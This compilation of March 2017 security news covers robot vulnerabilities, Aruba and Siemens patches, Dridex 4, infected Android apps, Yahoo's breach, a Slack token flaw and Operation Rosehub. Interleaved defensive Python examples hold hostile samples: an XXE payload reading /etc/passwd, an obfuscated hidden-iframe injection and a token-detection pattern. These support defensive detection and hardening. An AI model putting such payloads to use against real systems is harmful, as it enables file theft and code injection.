2.3.2017 securityweek Vulnerability

The software and firmware that bring robots to life are affected by potentially serious vulnerabilities that can allow hackers to remotely take control of the machines, according to an analysis conducted by security firm IOActive.

Robots are increasingly common in homes, businesses, industrial environments, the military and law enforcement, and healthcare organizations. International Data Corporation (IDC) estimated in January that worldwide spending on robotics and related services will reach $188 billion in 2020.

There have been many cases in past years where people were injured or killed in accidents involving robots, and experts warn that robots could pose an even more serious threat if they are vulnerable to remote hacker attacks.

IOActive researchers have analyzed home, industrial and business robots from six different vendors: SoftBank Robotics (NAO and Pepper robots), UBTECH Robotics (Alpha 1S and Alpha 2), ROBOTIS (ROBOTIS OP2 and THORMANG3), Universal Robots (UR3, UR5 and UR10), Rethink Robotics (Baxter and Sawyer), and Asratec Corp (V-Sido robot control system).

The researchers have not acquired the actual robots and instead conducted tests on their mobile applications, software and firmware.

IOActive said it identified nearly 50 vulnerabilities in the tested components, but the security firm noted that it did not conduct an in-depth analysis, which suggests that the actual number of weaknesses is likely much higher.

The company has only published a paper providing a non-technical description of the vulnerabilities. Technical details will be made available after vendors have had a chance to address the flaws.

IOActive told SecurityWeek that it has notified all affected vendors, but only four of them have responded so far: SoftBank Robotics, UBTECH Robotics, Universal Robots and Rethink Robotics.

“Just one, SoftBank Robotics, said they were going to fix the issues but without any further details on when and how they are going to do it and what issues they were going to fix,” said Cesar Cerrudo, IOActive’s CTO and one of the paper’s authors. “Then Universal Robots said that our findings were interesting and that they should do something about it without giving any details. The rest haven’t mentioned if they are going to fix the issues or not.”

Robot vulnerabilities and impact

According to IOActive, the robots it has analyzed are affected by various types of vulnerabilities, including problems related to communications, authentication, authorization mechanisms, cryptography, privacy, default configurations, and open source components.

The flaws allow attackers to intercept communications between the robot and the application controlling it, remotely access critical services without a username and password, install malicious software, and extract sensitive information that is not encrypted properly.

Researchers said the vulnerabilities they identified can be exploited to spy via the robot’s camera and microphone, steal personal or business data, and even take control of the machine and cause physical damage or harm.

“Vendors need to start focusing more on security when speeding the latest innovative robot technologies to market or the issue of malfunctioning robots will certainly be exasperated when malicious actors begin exploiting common security vulnerabilities to add intent to malfunction,” Cerrudo said.


Aruba Patches Vulnerabilities in AirWave Product

2.3.2017 securityweek Vulnerability
HPE-owned network access solutions provider Aruba has patched XML external entity (XXE) and cross-site scripting (XSS) vulnerabilities in its AirWave network management platform.

The vulnerabilities were reported to Aruba by Pichaya Morimoto of SEC Consult and independently by two other researchers. Both weaknesses affect AirWave’s VisualRF component.

The XXE flaw, tracked as CVE-2016-8526, allows a low-privileged user to read files on the system, including ones that may contain passwords, which could lead to privilege escalation.

According to Aruba, this security hole is considered low risk on AirWave systems with a single administrator, but the risk increases in environments with users that have different privilege levels.

“The vulnerability can be exploited by a low privileged read-only user to read sensitive information / files with malicious XML code,” SEC Consult said in its advisory. “Note that as Aruba's passwords are encrypted with a shared static key, privilege escalation to admin role is also possible!”
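The file read described above works because the XML parser resolves an external entity (a SYSTEM identifier such as a file:// URL) declared in the document's DOCTYPE and splices the file's contents into the parsed result. The hardened parser below is an added example, not Aruba's or SEC Consult's code; it uses Python's stdlib expat bindings, the sample documents are constructed, and the `allow_doctype` switch exists only to show that the second guard still holds when the first is relaxed.

```python
import xml.parsers.expat as expat


class UnsafeXMLError(Exception):
    """Raised when untrusted XML tries something an XXE payload relies on."""


# Constructed sample documents (not taken from AirWave).
BENIGN_XML = "<site><name>Floor 3</name><ap>ap-01</ap></site>"
XXE_XML = ('<?xml version="1.0"?>'
           '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           '<site><name>&xxe;</name></site>')


def parse_untrusted_xml(text, allow_doctype=False):
    """Parse untrusted XML into a flat {element path: text} dict.

    Two independent guards stop the XXE pattern:
      1. any DOCTYPE is refused outright (the usual hardening), and
      2. even if DOCTYPE is allowed, a reference to an external entity is
         refused instead of being fetched and inserted into the document.
    """
    parser = expat.ParserCreate()
    parser.buffer_text = True          # deliver text nodes in whole chunks
    values = {}
    stack = []                         # open element names, root first

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_doctype:
            raise UnsafeXMLError("DOCTYPE declaration refused in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        # Returning a child parser here would read system_id (a local file or
        # URL) and expose its contents to the caller; refuse instead.
        raise UnsafeXMLError("external entity reference refused: %r" % system_id)

    def on_start(tag, attrs):
        stack.append(tag)

    def on_end(tag):
        stack.pop()

    def on_text(data):
        data = data.strip()
        if data and stack:
            path = "/".join(stack)
            values[path] = values.get(path, "") + data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(text, True)
    return values


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_XML))
    for allow in (False, True):
        try:
            parse_untrusted_xml(XXE_XML, allow_doctype=allow)
        except UnsafeXMLError as err:
            print("allow_doctype=%s -> refused: %s" % (allow, err))
```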

The reflected XSS flaw, identified as CVE-2016-8527, can allow an attacker to obtain sensitive information, such as passwords and session cookies, but they need to trick an AirWave administrator into clicking on a specially crafted link.

The vulnerabilities were reported by SEC Consult in late November 2016 and they were fixed on February 21 with the release of AirWave 8.2.3.1. SEC Consult has classified the flaws as “high impact,” but Aruba has assigned them a “medium” severity rating.

Last year, Google security engineer Sven Blumenstein reported finding more than two dozen vulnerabilities in Aruba products, including ArubaOS, AirWave and Aruba Instant.

This is also not the first time SEC Consult has analyzed Aruba products. As part of its research into the reuse of cryptographic keys, the security firm discovered that Aruba had been using the same certificate for tens of thousands of devices.

Aruba has been running a private bug bounty program on BugCrowd with rewards of up to $1,500 per vulnerability.


Flaws Patched in Siemens RUGGEDCOM NMS Product

2.3.2017 securityweek Vulnerability
An update released by Siemens for its RUGGEDCOM network management system (NMS) patches a cross-site request forgery (CSRF) vulnerability and a cross-site scripting (XSS) vulnerability.

Used in various sectors worldwide, the RUGGEDCOM NMS allows organizations to monitor, configure and maintain their RUGGEDCOM mission-critical networks.

According to advisories published by Siemens and ICS-CERT, the product is affected by flaws that may allow a remote attacker to perform administrative operations.

The CSRF vulnerability, tracked as CVE-2017-2682 and assigned a CVSS score of 8.8, affects the product’s web interface and it can be exploited to get an authenticated user to execute various commands on behalf of the attacker. The attacker needs to trick the targeted user into clicking on a specially crafted link.

The XSS flaw, identified as CVE-2017-2683 and assigned a CVSS score of 6.3, could allow a non-privileged attacker to obtain administrative permissions by getting a user to click on a malicious link.


The vulnerabilities affect all versions of the RUGGEDCOM NMS, for both Windows and Linux, prior to 2.1.0. Siemens has advised customers to update their installations to the latest version and configure their environments as specified in the company’s operational guidelines for industrial security.

ICS-CERT said there was no evidence that the flaws had been exploited for malicious purposes.

In recent months, Siemens has also released security updates for SIPROTEC, SCALANCE, Desigo PX, SIMATIC and various other products.


New Malware Will Soon Start "AtomBombing" U.S. Banks

2.3.2017 securityweek Virus
New Dridex 4 Banking Malware With AtomBombing Code Injection is Expected to be Used Against U.S. Banks

A new version of the Dridex banking malware has been detected targeting European banks, and is expected to be used against U.S. financial institutions in the coming months. Dridex 4 incorporates the usual range of software improvements that we have come to expect from professionally maintained malware -- but it is also the first major malware to have adopted the new code injection technique known as 'AtomBombing'.

AtomBombing was described by researchers at enSilo in October 2016. It is so named because of its use of Windows' atom tables -- read/writable stores of data that can be used by multiple applications. Malicious code can be written to the atom tables, and then retrieved and injected into executable memory space.

This process does not require any exploit against Windows, since it makes use of a feature provided by Windows. Ultimately, it is simply a new code injection technique likely to bypass existing AV and NGAV detections.

Dridex 4 was discovered by IBM X-Force in early February. Interestingly, it doesn't implement AtomBombing exactly as described by enSilo. "In our analysis of the new Dridex v4 release," says IBM, "we discovered that the malware's authors have devised their own injection method, using the first step of the AtomBombing technique. They use the atom tables and NtQueueAPCThread to copy a payload and an import table into a RW memory space in the target process. But they only went halfway - they used the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself."

Since enSilo's original description of the technique, malware defenders will have been developing means to detect it. Dridex 4 hopes to bypass these current detections by using a modified method of AtomBombing. "Malware writers modify their software frequently as part of the cat-and-mouse game played between attackers and defenders," explains F-Secure's Andy Patel. "It doesn't surprise me that the authors of Dridex pulled enSilo's research into their new version so rapidly -- it's a perfect application for that hooking technique. What's even more interesting is that they modified it themselves, thus avoiding any detection techniques that might have been pre-emptively created based on enSilo's findings."

In other words, Dridex 4 was a threat only for so long as it remained undetected. Now that it has been detected and analyzed by IBM, users with fully maintained mainstream anti-malware defenses will rapidly be protected -- until the next new technique. "Defenders will now modify their detection approaches to catch the new techniques found in Dridex, and the cycle will continue," explains Patel.

This disinclination to describe Dridex and AtomBombing as a dangerous new game-changer is echoed by Luis Corrons, technical director at PandaLabs. "The way the attack is performed to inject code is new, although... malware has used malware injection techniques for a long time, for instance you can see that in many ransomware families." It is, he said, "just another technique to be used by malware once it is already in the victim's computer. It is easy to implement, so we'll see it in some other malware attacks; however, from my personal opinion it is not something we have to worry about."

It should be noted that the enSilo researcher who discovered AtomBombing, Tal Lieberman, is not convinced that the Dridex method is purely for evasion. "This adaptation actually simplifies the technique we described. Most likely, the malware authors decided to forego sophistication as they believed that their version is stealthy enough also without increased evasion measures."

Although Dridex is not 'non-malware', it is still "part of the growing trend towards fileless malware," he added, "as that allows the malware to protect itself from the prying eyes of security researchers. The reason is that an executable, once caught by a security solution, is uploaded to the cloud for analysis by security vendors and other security researchers."

The primary threat from Dridex 4 consequently occurred while it was still unknown. The authors knew this, and included improvements to its anti-research and anti-AV capabilities. "In this release," comment the IBM researchers, "we noted that special attention was given to dodging antivirus (AV) products and hindering research by adopting a series of enhanced anti-research and anti-AV capabilities."

Two upgrades given special note by IBM include enhanced encryption, and an updated persistence mechanism. Firstly, it uses a modified naming algorithm. "In the new version, while the same variables are still being used to generate [MD5] hashes, the sequence has changed to shuffle things around and prevent detection by automated checks."

Secondly, Dridex 4 has similarly modified its configuration file encryption. "Overall, Dridex continues to use the same multilayered approach it used in v3 variants, but it has changed and enhanced the encryption while still relying heavily on the RC4 cipher."

The persistence mechanism has been changed. Earlier versions used 'invisibility'. The DLL would only get written to disk with a registry value at shutdown. The new version has adopted a "robustness-over-stealth approach for its persistence mechanism." An executable is now copied, explains IBM, "from system32 into a different directory and Dridex's DLL is placed in that same directory. The malicious DLL mimics a legitimate DLL that's loaded by the executable."

Overall, perhaps the greatest significance of Dridex 4 is not the inclusion of AtomBombing per se, but the speed with which new techniques are incorporated into major malware. It seems that Andy Patel is somewhat surprised that it happened at all. "As for banking trojans in general, we were assuming they'd continue to lose marketshare as banks improved their back end anti-fraud algorithms."


Apps Containing Malicious IFrames Found on Google Play

2.3.2017 securityweek Android
Recent analysis has found 132 Android applications in the official Google Play app store that have been infected with tiny hidden IFrames linking to malicious domains, Palo Alto Networks researchers warn.

The IFrames were found in the applications’ local HTML pages, which is most probably the result of the app developers’ development platforms being infected. According to Palo Alto’s security researchers, the malware infecting these platforms might have been designed to search for HTML pages and inject malicious content at the end of the found pages.

This also means that the mobile malware originated from infected development platforms without developers’ awareness. Previous examples of similar issues include the XcodeGhost compiler malware designed to target iOS and OS X, and the Vpon ad SDK for iOS.

The most popular of the newly discovered infected Android apps had more than 10,000 installs, the researchers note. The Google Security Team was already informed on the matter and all infected apps have been removed from Google Play.

What the infected apps had in common was the use of Android WebView to display static HTML pages, with each page seemingly doing nothing more than loading locally stored pictures and showing hard-coded text. However, the researchers discovered that the actual HTML code included a tiny hidden IFrame linking to well-known malicious domains.

The linked domains were down at the time of investigation, but the security researchers say that one of the infected pages also attempted to download and install a malicious Microsoft Windows executable file (which didn’t execute, since the device wasn’t running Windows). This behavior, however, is classified as Non-Android Threat, a category that includes apps that, although unable to cause harm to the user or Android device, contain components potentially harmful to other platforms.

The infected Android apps were also found to require only the Internet permission and, in addition to their main functionality, to be able to load interstitial advertisements. The latter, researchers say, instantiates an Android WebView component and displays a local HTML page (the WebView component was also found to have JavaScriptInterface enabled).

The IFrame was hidden in the infected HTML pages either by being tiny (width and height of 1 pixel) or by having the display attribute set to None. To avoid detection based on simple string matching, the source URLs were obfuscated using HTML number codes, the researchers discovered. Eventually, the linked domains were revealed to be www[.]Brenz[.]pl/rc/ and jL[.]chura[.]pl/rc/, both of which were taken down in 2013 by the Polish CERT (cert.pl), so they no longer host malware.

The security researchers also discovered a sample that contained an entire VBScript injected into the HTML instead. The script contained a Base64-encoded Windows executable, so it could not execute on Android. The code was appended outside the <HTML> tag, making it an invalid HTML page, but browsers attempt to render such pages anyway.
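The three traits described above (a 1x1 or display:none frame, a src written as HTML numeric character references, content appended after the closing html tag) can be checked for in a build or app-vetting pipeline. The scanner below is an added example, not Palo Alto's tooling; the sample page is constructed, and the injected domain is a placeholder rather than one of the indicators named above.

```python
from html.parser import HTMLParser

# Constructed sample: a static WebView page like the ones described above, with
# an iframe appended after </html>. The domain is a placeholder, not a real IoC.
INJECTED_URL = "http://injected.example/rc/"
SAMPLE_HTML = (
    "<html><body><img src='logo.png'><p>Welcome</p>"
    "<iframe src='help.html' width='300' height='200'></iframe>"
    "</body></html>\n"
    # src spelled out as decimal character references (&#104;&#116;...)
    "<iframe src=\"" + "".join("&#%d;" % ord(c) for c in INJECTED_URL)
    + "\" width=\"1\" height=\"1\" style=\"display: none\"></iframe>\n"
)


def _is_tiny(value):
    """True for sizes such as '1' or '1px'; the infected pages used 1x1 frames."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return digits != "" and int(digits) <= 2


class HiddenIframeScanner(HTMLParser):
    """Collect iframes that look injected: tiny or hidden by style, src written
    as character references, or placed after the document's closing html tag."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.html_closed = False        # set once </html> has been seen

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        # HTMLParser hands us attribute values with character references already
        # decoded, so the decoded src is free; the raw tag text shows obfuscation.
        a = {k: (v or "") for k, v in attrs}
        raw = self.get_starttag_text() or ""
        reasons = []
        if _is_tiny(a.get("width")) and _is_tiny(a.get("height")):
            reasons.append("tiny-frame")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-style")
        if "&#" in raw:
            reasons.append("charref-obfuscated-src")
        if self.html_closed:
            reasons.append("after-html-close")
        if reasons:
            self.findings.append({"src": a.get("src", ""),
                                  "line": self.getpos()[0],
                                  "reasons": reasons})


def scan_html(text):
    """Return a list of suspicious iframes found in one HTML document."""
    scanner = HiddenIframeScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```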

The 132 infected apps were found to belong to seven unrelated developers, though all of them have connections to Indonesia, with a significant number of discovered samples having the word “Indonesia” in their names. The security researchers also note that the HTML files were infected with malicious IFrames either through file-infecting viruses like Ramnit (threats that append IFrames to each HTML file found on compromised hosts) or through an infected IDE.

Palo Alto suggests that the developers are not malicious but victims in this attack, as all samples share similarities in their coding structure, which suggests they may be generated from the same platform, and because the malicious domains used to resolve to sinkholes. The fact that one sample attempts to download a Windows executable is also important, as it shows the attacker does not know about the target platform, which the app developers do.

The researchers warn that an attacker could use this attack method to point to active malicious domains, or could place malicious scripts on the remote server and utilize the JavaScriptInterface to access the infected apps’ native functionality. Thus, the attacker would be able to access all resources within the infected app and could replace them with their own, or could modify the app’s internal logic to add malicious capabilities.


Forged Cookie Attack Affected 32 Million Yahoo Users

2.3.2017 securityweek Attack
The recently disclosed security incident involving forged cookies affected 32 million user accounts, Yahoo said in its annual filing to the U.S. Securities and Exchange Commission (SEC).

Yahoo has suffered several major breaches over the past years, which led to the company slashing the price of the $4.8 billion Verizon acquisition deal by $350 million.

The Internet giant disclosed one of the breaches in September 2016, when it told users that a threat actor, believed to be sponsored by a nation state, had stolen roughly 500 million accounts from its network in late 2014. In December 2016, the company disclosed an even bigger breach, one that occurred in August 2013 and affected one billion accounts.

An investigation also revealed that attackers, believed to be connected to the group behind the 2014 incident, used their access to the company’s systems to forge cookies that allowed them to log into accounts without needing a password. Investigators determined that the forged cookies were used or taken in 2015 and 2016, and the incident affected approximately 32 million accounts.

A probe conducted by outside investigators determined that the 2014 incident was not properly investigated. Yahoo became aware in late 2014 that a suspected state-sponsored actor had exploited the company’s account management tool to access 26 user accounts, but it did not investigate further. Yahoo said in its SEC filing:

“While significant additional security measures were implemented in response to those incidents, it appears certain senior executives did not properly comprehend or investigate, and therefore failed to act sufficiently upon, the full extent of knowledge known internally by the Company’s information security team. Specifically, as of December 2014, the information security team understood that the attacker had exfiltrated copies of user database backup files containing the personal data of Yahoo users but it is unclear whether and to what extent such evidence of exfiltration was effectively communicated and understood outside the information security team. However, the Independent Committee did not conclude that there was an intentional suppression of relevant information.

Nonetheless, the Committee found that the relevant legal team had sufficient information to warrant substantial further inquiry in 2014, and they did not sufficiently pursue it. As a result, the 2014 Security Incident was not properly investigated and analyzed at the time, and the Company was not adequately advised with respect to the legal and business risks associated with the 2014 Security Incident.”

In a blog post published on Tumblr on Wednesday, Yahoo CEO Marissa Mayer said she decided to forgo her annual bonus (up to $2 million) and equity grant (roughly $12 million). Mayer said she expressed her desire to have the bonus distributed to the “company’s hardworking employees, who contributed so much to Yahoo’s success in 2016.”

More than 40 class actions have been filed against Yahoo over the security incidents, and the company said it had spent $16 million by the end of 2016, including on forensics investigations, remediation activities and legal fees.


Slack Quickly Patches Account Hijacking Flaw

2.3.2017 securityweek Vulnerability
It only took the developers of the Slack team collaboration tool five hours to patch a critical vulnerability that could have been exploited to steal a user’s private token and gain access to their account.

The security hole was identified by Detectify researcher Frans Rosén, who discovered that an attacker can steal a user’s token by getting them to access a specially crafted webpage.

The attack method targeted the xoxs token, which provides complete access to a user’s Slack account. A malicious hacker could have obtained this token by creating a page that reconnected the victim’s Slack WebSocket to their own WebSocket.

The vulnerability was reported by Rosén on February 17 and it was patched by Slack developers within five hours. The researcher, who currently has the second highest number of reputation points in Slack’s HackerOne bug bounty program, has been awarded $3,000 for his work.

Slack said it performed a thorough investigation to ensure that the vulnerability was never exploited for malicious purposes. Rosén has made available detailed technical information and a video demonstrating the attack.

Last year, Detectify warned that many developers had unknowingly leaked their Slack tokens on GitHub, exposing business-critical and other sensitive information. Experts identified more than 1,500 tokens at the time.
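A leaked token of the kind described above is as good as a password, so many teams run a secret scanner over files before they are committed. As an added example (not Detectify's tool), here is a minimal scanner for Slack-style tokens. The pattern is an assumption based on the public "xox" prefix family of Slack tokens (including the xoxs session tokens mentioned earlier) and should be adjusted to the formats a workspace actually issues; the sample file content is constructed.

```python
"""
Minimal Slack token scanner for pre-commit or repository sweeps.

Added example, not Detectify's scanner.  Matches are reported masked so the
finding itself does not re-leak the secret.
"""
import re
from typing import List, Tuple

# Assumption: Slack tokens start with "xox" plus a type letter (a, b, e, p,
# r and s are the commonly seen ones) and a dash-separated body of letters
# and digits.  Tighten this to the exact formats your workspace issues.
SLACK_TOKEN_RE = re.compile(r"\bxox[abeprs]-[A-Za-z0-9-]{10,}")


def mask(token: str) -> str:
    """Keep the type prefix for triage, hide the rest."""
    return token[:8] + "..." + "*" * 6


def find_slack_tokens(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, masked_token) for every token-looking string in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in SLACK_TOKEN_RE.finditer(line):
            hits.append((lineno, mask(match.group(0))))
    return hits


def scan_file(path: str) -> List[Tuple[int, str]]:
    """Scan one file on disk; binary-ish content is read leniently."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return find_slack_tokens(fh.read())


# Constructed sample of a settings file a developer might commit by mistake.
SAMPLE = """\
# deploy settings
SLACK_WEBHOOK=https://hooks.example.invalid/services/T000/B000/XXXX
SLACK_BOT_TOKEN=xoxb-123456789012-AbCdEfGhIjKlMnOpQrSt
api_key = "not-a-token"
legacy = 'xoxp-111111111111-222222222222-abcdefghij'
"""

if __name__ == "__main__":
    for lineno, masked in find_slack_tokens(SAMPLE):
        print(f"line {lineno}: possible Slack token {masked}")
```

Wired into a pre-commit hook, `scan_file` over the staged files blocks the commit that would otherwise publish the token; the same function run over a clone's history finds tokens that were already pushed and must be revoked rather than merely deleted.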

Slack has so far paid out more than $200,000 through its bug bounty program, including $9,000 to researcher David Vieira-Kurz for a couple of serious vulnerabilities that could have been leveraged to obtain sensitive information and take over user accounts.


Google Employees Help Thousands Of Open Source Projects Patch Critical ‘Mad Gadget Bug’
2.3.2017 thehackernews Vulnerability

Last year Google employees took an initiative to help thousands of Open Source Projects patch a critical remote code execution vulnerability in a widely used Apache Commons Collections (ACC) library.
Dubbed Operation Rosehub, the initiative was staffed by some 50 Google employees who volunteered 20 percent of their work time to patch thousands of open source projects on GitHub that were vulnerable to the "Mad Gadget vulnerability."
Mad Gadget vulnerability (CVE-2015-6420) is a remote code execution bug in the Java deserialization used by the Apache Commons Collections (ACC) library that could allow an unauthenticated, remote attacker to execute arbitrary code on a system.
The ACC library is widely deployed by many Java applications to decode data passed between computers. To exploit this flaw, all an unauthorized attacker needs to do is submit maliciously crafted input to an application on a targeted system that uses the ACC library.
Once the vulnerable ACC library on the affected system deserializes the content, the attacker could remotely execute arbitrary code on the compromised system, which could then be used to conduct further attacks.
Remember the ransomware attack on the Muni Metro system? Late last year, an anonymous hacker managed to infect and take over more than 2,000 computers using this same Mad Gadget flaw in the software used to operate San Francisco's public transport system.
Following the public disclosure of the Mad Gadget flaw, almost every commercial enterprise including Oracle, Cisco, Red Hat, VMWare, IBM, Intel, Adobe, HP, Jenkins, and SolarWinds formally disclosed that they had been impacted by this vulnerability and patched it in their software.
However, a few months after all the big businesses had patched the flaw, one of the Google employees noticed that several prominent open source libraries still depended on vulnerable versions of the ACC library.
"We recognized that the industry best practices had failed. An action was needed to keep the open source community safe. So rather than simply posting a security advisory asking everyone to address the vulnerability, we formed a task force to update their code for them. That initiative was called Operation Rosehub," Justine Tunney, Software Engineer on TensorFlow, wrote on Google Open Source Blog.
Under Operation Rosehub, patches were sent to many open source projects, although the Google employees were only able to patch open source projects on GitHub that directly referenced vulnerable versions of the ACC library.
According to the Open Source Blog, if the San Francisco Municipal Transportation Agency's software systems had been open source, Google engineers would also have been able to deliver patches for Mad Gadget to them, and their systems would have never been compromised.
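The step Operation Rosehub automated, finding projects that directly reference a vulnerable ACC version, can be reproduced in a few lines. As an added example (not Google's tooling), here is a check over a Maven pom.xml that resolves version properties and flags Apache Commons Collections dependencies below the versions that shipped the fix for CVE-2015-6420. The fixed versions assumed are 3.2.2 for commons-collections:commons-collections and 4.1 for org.apache.commons:commons-collections4; the sample POM is constructed.

```python
"""
Flag Maven dependencies on Apache Commons Collections versions affected by
CVE-2015-6420 ("Mad Gadget").

Added example in the spirit of Operation Rosehub, not Google's tooling.
Assumed fixed versions: 3.2.2 (commons-collections line), 4.1 (collections4).
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

FIXED_VERSIONS = {
    ("commons-collections", "commons-collections"): (3, 2, 2),
    ("org.apache.commons", "commons-collections4"): (4, 1),
}
MAVEN_NS = "{http://maven.apache.org/POM/4.0.0}"


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.2.1' -> (3, 2, 1).  Qualifiers such as '-SNAPSHOT' are dropped."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_vulnerable(group: str, artifact: str, version: str) -> bool:
    """True when (group, artifact) is an ACC line and version predates the fix."""
    fixed = FIXED_VERSIONS.get((group, artifact))
    if fixed is None:
        return False
    parsed = parse_version(version)
    if not parsed:
        return True          # unparseable (e.g. unresolved property): needs review
    padded = parsed + (0,) * (len(fixed) - len(parsed))   # '3.2' -> (3, 2, 0)
    return padded[:len(fixed)] < fixed


def find_vulnerable_dependencies(pom_xml: str) -> List[Tuple[str, str, str]]:
    """Return (groupId, artifactId, resolved version) for each affected dependency."""
    root = ET.fromstring(pom_xml)
    ns = MAVEN_NS if root.tag.startswith(MAVEN_NS) else ""
    # Resolve ${property} versions from the <properties> block only (simplification).
    props = {p.tag.replace(ns, ""): (p.text or "").strip()
             for p in root.findall(f"{ns}properties/*")}
    findings = []
    for dep in root.iter(f"{ns}dependency"):        # includes dependencyManagement
        group = dep.findtext(f"{ns}groupId", "").strip()
        artifact = dep.findtext(f"{ns}artifactId", "").strip()
        version = dep.findtext(f"{ns}version", "").strip()
        if version.startswith("${") and version.endswith("}"):
            version = props.get(version[2:-1], version)
        if is_vulnerable(group, artifact, version):
            findings.append((group, artifact, version))
    return findings


# Constructed sample POM: one vulnerable reference via a property, one fixed.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>org.example</groupId>
  <artifactId>demo</artifactId>
  <version>1.0</version>
  <properties>
    <acc.version>3.2.1</acc.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>${acc.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-collections4</artifactId>
      <version>4.1</version>
    </dependency>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.12</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    for group, artifact, version in find_vulnerable_dependencies(SAMPLE_POM):
        print(f"{group}:{artifact}:{version} is below the CVE-2015-6420 fix")
```

A direct reference is only part of the picture: the article's caveat that Rosehub could patch only projects that directly referenced ACC applies here too, since a vulnerable copy pulled in transitively through another library would not appear in this POM at all. Resolving the full dependency tree (for example from the build tool's dependency report) is the next step a practitioner would add.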


Tor webmail provider Sigaint is unavailable at least since February 11
2.3.2017 securityaffairs Security

For the third consecutive week, the popular Tor web email service SIGAINT is unavailable, and the real cause is a mystery.
SIGAINT is one of the largest web email services on the Tor network; it is used to send messages while preserving the user’s anonymity.

The service has run for years despite attempts by law enforcement agencies to deanonymize its users.

The SIGAINT (sigaintevyh2rzvw.onion) service is constantly under attack by government agencies; in April 2015 its administrator warned users of cyber attacks allegedly launched by a law enforcement agency that tried to hack the service.

In 2015, according to the administrator, a persistent attacker with access to nearly 70 bad Tor exit nodes (around 6 percent of the total) tried to compromise the email service.

One of the administrators of SIGAINT confirmed that his server was targeted by 58 malicious Tor exit nodes, and a member of the Tor Project, Philipp Winter, discovered another 12 bad exit nodes.

Back to the present: the email provider has been down since at least February 11, and there is no news about what is happening to the service. Of course, rumors on the Internet are speculating on the possible cause of the outage.

“Been happening for a few days actually. Possibly weeks if I didn’t notice it. Wanted to check out my email on sigaint, the front abuse page as it’s named didn’t load. So I loaded up wiki and tried out the .onion site and still didn’t work.” wrote a Reddit user in a thread titled ‘Cant access sigaint ? ‘. “Tried another day and then another day and still nothing. I’m not using bridges or anything, is this happening to more people? Thanks for answers. Wasn’t sure where to post this so thought this would be a good place I hope.”

Anyway, even though the Sigaint service is still down, there are many other dark web email providers; below is a short list published by freedomhacker.net.

RuggedInbox – s4bysmmsnraf7eut.onion
Torbox – torbox3uiot6wchz.onion
Bitmessage – bitmailendavkbec.onion, clearweb
Mail2Tor – mail2tor2zyjdctd.onion
RiseUp – nzh3fv6jc6jskki3.onion, clearweb
Lelantos – lelantoss7bcnwbv.onion, paid accounts only
Autistici – wi7qkxyrdpu5cmvr.onion, clearweb
AnonInbox – ncikv3i4qfzwy2qy.onion, paid accounts only
VFEMail – 344c6kbnjnljjzlz.onion, clearweb

Out of curiosity: a Sigaint user is offering 20k to get their emails back.

“Hello friends, back again. Since my original post I have heard from a few others who are on board to put down money in order to get their emails back. I personally would be willing to chip in $10,000 for a download of all my emails from my accounts. Maybe more. There is no question I could get another $10,000 from a few friends who also would want their emails. Maybe more.” reads the user.

“Sigaint if you are reading this and plan to never return, please reach out. Stupidly enough, I pretty much stored my entire life on the Sigaint email. I had thought we would make 3 letter agencies cry forever 🙁

Do you want to stay anonymous as for some reason you cannot show face as Sigaint? Claim to be a hacker who stole the emails from Sigaint and we can use the mods of the hub, tmg, or a market as escrow.”


Internet Explorer and Edge have a dangerous flaw. There is no patch

2.3.2017 Novinky/Bezpečnost Vulnerabilities
The national security team CSIRT.CZ has warned of a flaw affecting the Internet Explorer and Edge web browsers. It poses a major risk to users chiefly because no fix is available yet. Attackers can exploit it fairly easily.
The flaw was discovered under Google’s Project Zero program, in which developers regularly report bugs that are very dangerous for users.

Paradoxically, this step has also handed cybercriminals a guide to exploiting the vulnerability. “Google Project Zero has published a vulnerability in the Edge and Internet Explorer browsers, including a piece of code that makes it possible to verify the existence of this flaw,” said Pavel Bašta, security analyst at CSIRT.CZ, which is operated by the CZ.NIC association.

They can run arbitrary code
“It did so after the expiry of the standard 90-day period during which the vendor has time to create a patch. The vulnerability is designated CVE-2017-0037, and exploiting it can cause an error in the browser that leads to a crash,” Bašta stated.

According to him, however, the vulnerability may have a far greater impact on users than it might seem at first glance. “The details of the vulnerability also mention the possibility of executing arbitrary code,” the security expert emphasized.

In other words, cybercriminals can exploit the flaw to smuggle practically any malicious program onto someone else’s computer. With its help they would then be able to access stored data, eavesdrop on internet communication, or take over the computer completely.

When will there be a patch? Nobody knows yet...
Similar critical flaws appear in individual programs fairly regularly, and not only in those from the American software giant. As a rule, however, the companies only report them once a corresponding patch is available, that is, only once users can defend themselves.

That is not the case at the moment for the vulnerability in the Edge and Internet Explorer browsers. Microsoft has not even said when an update fixing the flaw should be released.

For security reasons, it is therefore currently advisable to use a competing browser for browsing the web.


